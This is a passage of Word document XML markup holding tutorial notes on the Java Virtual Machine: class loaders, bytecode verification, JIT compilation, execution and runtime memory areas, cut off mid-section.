      </w:r>
    </w:p>
    <w:p w14:paraId="34467163" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Loads core Java classes (from rt.jar and other core libraries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78B504" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Written in native code (not Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC509F5" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>b) Extension ClassLoader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241BDBFD" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Loads classes from Java extension directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD3469C" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c) Application ClassLoader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5348B65F" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Loads your application classes (from the classpath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3790BD34" w14:textId="022AC53B" w:rsidR="00BD0987" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0987" w:rsidP="00BD0987">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27894357" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Bytecode Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E91880" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM verifies the bytecode to ensure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245DD3AC" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No illegal memory access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8E39E9" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proper stack manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715083F9" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Correct method calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E3C99D" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No violation of access restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA6414" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This provides security by preventing malicious code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D86A19" w14:textId="77777777" w:rsidR="00BD0987" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0987" w:rsidP="00BD0987">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9E1727" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Just-In-Time (JIT) Compilation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEAFC60" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The JVM's JIT compiler converts frequently executed bytecode into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>native machine code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0B41D" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Happens at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696A69B7" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Optimizes performance by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32667FA0" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inlining methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213AF76A" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Removing dead code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3272A0" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Optimizing loops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7B731" w14:textId="77777777" w:rsidR="00BD0987" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0987" w:rsidP="00BD0987">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20644B27" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A3E7B7" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The JVM executes the program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD3B70" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Creates the main thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DDF701" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Allocates memory for objects in the Heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B59A77F" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Manages method calls using the Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197B8D94" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Handles garbage collection automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7332F524" w14:textId="77777777" w:rsidR="007721FC" w:rsidRPr="00CE4B95" w:rsidRDefault="007721FC" w:rsidP="00C15401">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F32375" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Runtime Memory Areas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A41E4B" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The JVM manages these memory areas during execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602ACE1A" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a) Method Area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6531B7C0" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
